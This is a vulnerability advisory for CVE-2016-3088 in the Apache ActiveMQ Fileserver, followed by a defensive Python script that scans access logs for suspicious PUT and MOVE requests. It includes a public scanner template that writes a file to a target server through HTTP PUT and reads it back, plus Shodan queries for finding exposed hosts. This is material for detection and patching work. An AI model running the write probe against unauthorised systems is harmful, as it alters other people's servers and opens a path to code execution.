CVE-2016-3088: Apache ActiveMQ Fileserver - Arbitrary File Write

Date: 2025-08-01 | Affected software: Apache ActiveMQ Fileserver | PoC: public

Vulnerability description

Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.

PoC code [public]

id: CVE-2016-3088

info:
  name: Apache ActiveMQ Fileserver - Arbitrary File Write
  author: fq_hsu
  severity: critical
  description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
  impact: |
    An attacker can write arbitrary files on the server, potentially leading to remote code execution.
  remediation: |
    Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/40857
    - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
    - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2016-3088
    - http://rhn.redhat.com/errata/RHSA-2016-2036.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3088
    cwe-id: CWE-20
    epss-score: 0.9429
    epss-percentile: 0.99933
    cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: activemq
    shodan-query:
      - cpe:"cpe:2.3:a:apache:activemq"
      - product:"activemq openwire transport"
  tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive
variables:
  rand1: '{{rand_int(11111111, 99999999)}}'

http:
  - raw:
      - |
        PUT /fileserver/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

        {{rand1}}
      - |
        GET /fileserver/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1==204"
          - "status_code_2==200"
          - "contains((body_2), '{{rand1}}')"
        condition: and
# digest: 4a0a00473045022100d79c4d5f1abd41cb026f80c7096e440586e41384f8c7d04244584011a3727e9602201066bc695b7951a0e92b5d0b4e04a2cbac24f9025649b05d3dc05b3c1a7370a7:922c64590222798bb761d5b6d8e72950
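
A defender-side check for the request sequence in the description, added here as an example and not part of the original template: it scans web access logs for successful PUT requests under /fileserver/ and escalates a finding when a successful MOVE for the same path follows. The Common Log Format layout, the sample lines and the severity labels are assumptions.

```python
import re

# Common Log Format request line; the log layout is an assumption.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Aug/2025:10:00:01 +0000] "PUT /fileserver/a1b2c3.txt HTTP/1.1" 204 0
192.0.2.10 - - [01/Aug/2025:10:00:02 +0000] "GET /fileserver/a1b2c3.txt HTTP/1.1" 200 8
192.0.2.10 - - [01/Aug/2025:10:00:05 +0000] "MOVE /fileserver/a1b2c3.txt HTTP/1.1" 204 0
198.51.100.7 - - [01/Aug/2025:10:01:00 +0000] "PUT /fileserver/blocked.txt HTTP/1.1" 403 0
198.51.100.7 - - [01/Aug/2025:10:01:01 +0000] "MOVE /fileserver/blocked.txt HTTP/1.1" 403 0
203.0.113.5 - - [01/Aug/2025:10:02:00 +0000] "GET /admin/ HTTP/1.1" 401 0
203.0.113.9 - - [01/Aug/2025:10:03:00 +0000] "PUT /fileserver/probe.txt HTTP/1.1" 204 0
"""

def find_fileserver_writes(log_text):
    """Return one finding per successful PUT under /fileserver/.

    Severity is 'medium' for a write alone and 'high' once a successful
    MOVE for the same path is seen later (from any client)."""
    by_path = {}      # path -> most recent finding for that path
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # line is not in the assumed format
        path = m["path"].split("?", 1)[0]
        if not path.lower().startswith("/fileserver/"):
            continue
        if not m["status"].startswith("2"):
            continue  # rejected requests did not change anything
        if m["method"] == "PUT":
            finding = {"path": path, "put_client": m["client"], "put_at": m["ts"],
                       "move_client": None, "move_at": None, "severity": "medium"}
            by_path[path] = finding
            findings.append(finding)
        elif m["method"] == "MOVE" and path in by_path:
            by_path[path].update(move_client=m["client"], move_at=m["ts"],
                                 severity="high")
    return findings

if __name__ == "__main__":
    for f in find_fileserver_writes(SAMPLE_LOG):
        print(f["severity"], f["path"], f["put_client"], f["move_client"])
```

A "medium" finding on a host that should not expose the Fileserver application is still worth triage, since the template above confirms the issue with a PUT and GET alone.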
